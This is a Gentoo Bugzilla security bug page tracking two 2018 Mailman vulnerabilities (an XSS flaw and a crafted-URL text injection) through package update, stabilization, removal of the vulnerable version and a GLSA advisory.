Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 662902 (CVE-2018-0618, CVE-2018-13796) - <net-mail/mailman-2.1.29: multiple vulnerabilities (CVE-2018-{0618,13796})
Summary: <net-mail/mailman-2.1.29: multiple vulnerabilities (CVE-2018-{0618,13796})
Status: RESOLVED FIXED
Alias: CVE-2018-0618, CVE-2018-13796
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: Normal minor (vote)
Assignee: Gentoo Security
URL:
Whiteboard: B3 [glsa+ cve cleanup]
Keywords:
Depends on:
Blocks:
 
Reported: 2018-08-05 23:37 UTC by GLSAMaker/CVETool Bot
Modified: 2019-04-08 15:20 UTC (History)
3 users (show)

See Also:
Package list:
=net-mail/mailman-2.1.29
Runtime testing required: No
stable-bot: sanity-check+


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description GLSAMaker/CVETool Bot gentoo-dev 2018-08-05 23:37:34 UTC
CVE-2018-0618 (https://nvd.nist.gov/vuln/detail/CVE-2018-0618):
  Cross-site scripting vulnerability in Mailman 2.1.26 and earlier allows
  remote authenticated attackers to inject arbitrary web script or HTML via
  unspecified vectors.

CVE-2018-13796 (https://nvd.nist.gov/vuln/detail/CVE-2018-13796):
  An issue was discovered in GNU Mailman before 2.1.28. A crafted URL can
  cause arbitrary text to be displayed on a web page from a trusted site.
Comment 1 Thomas Stein 2018-09-07 07:00:50 UTC
Any chance of getting mailman 2.1.29 into the portage tree?

thanks and cheers
t.
Comment 2 Hanno Boeck gentoo-dev 2018-09-07 10:58:05 UTC
I committed 2.1.29 now. (CVE-2018-0618 looks like a legit issue, CVE-2018-13796 however I'd hardly call a vuln.)
Comment 3 Thomas Stein 2018-09-07 11:01:01 UTC
Thanks Hanno.
Comment 4 Hanno Boeck gentoo-dev 2018-10-07 08:32:40 UTC
I think this can go stable.
Comment 5 Aaron Bauman Gentoo Infrastructure gentoo-dev Security 2019-03-26 20:57:12 UTC
@arches, please stabilize.
Comment 6 Agostino Sarubbo gentoo-dev 2019-03-27 20:04:59 UTC
amd64 stable
Comment 7 Thomas Deutschmann gentoo-dev Security 2019-03-27 23:21:27 UTC
x86 stable
Comment 8 Thomas Deutschmann gentoo-dev Security 2019-03-27 23:46:22 UTC
x86 stable
Comment 9 Yury German Gentoo Infrastructure gentoo-dev Security 2019-03-28 03:30:56 UTC
GLSA Vote: Yes
New GLSA Request filed.

PPC please continue stabilization.
Comment 10 Sergei Trofimovich gentoo-dev 2019-04-08 06:09:29 UTC
ppc stable
Comment 11 Aaron Bauman Gentoo Infrastructure gentoo-dev Security 2019-04-08 13:44:30 UTC
@maintainers, please drop vulnerable.
Comment 12 Larry the Git Cow gentoo-dev 2019-04-08 14:09:13 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=70805405dd792848e1fdb6926ac3ce236d88947f

commit 70805405dd792848e1fdb6926ac3ce236d88947f
Author:     Hanno <hanno@gentoo.org>
AuthorDate: 2019-04-08 14:08:29 +0000
Commit:     Hanno <hanno@gentoo.org>
CommitDate: 2019-04-08 14:09:01 +0000

    net-mail/mailman: Remove vulnerable version.
    
    Bug: https://bugs.gentoo.org/662902
    Signed-off-by: Hanno Boeck <hanno@gentoo.org>
    Package-Manager: Portage-2.3.62, Repoman-2.3.12

 net-mail/mailman/Manifest              |   1 -
 net-mail/mailman/mailman-2.1.26.ebuild | 167 ---------------------------------
 2 files changed, 168 deletions(-)
Comment 13 GLSAMaker/CVETool Bot gentoo-dev 2019-04-08 15:20:33 UTC
This issue was resolved and addressed in
 GLSA 201904-10 at https://security.gentoo.org/glsa/201904-10
by GLSA coordinator Aaron Bauman (b-man).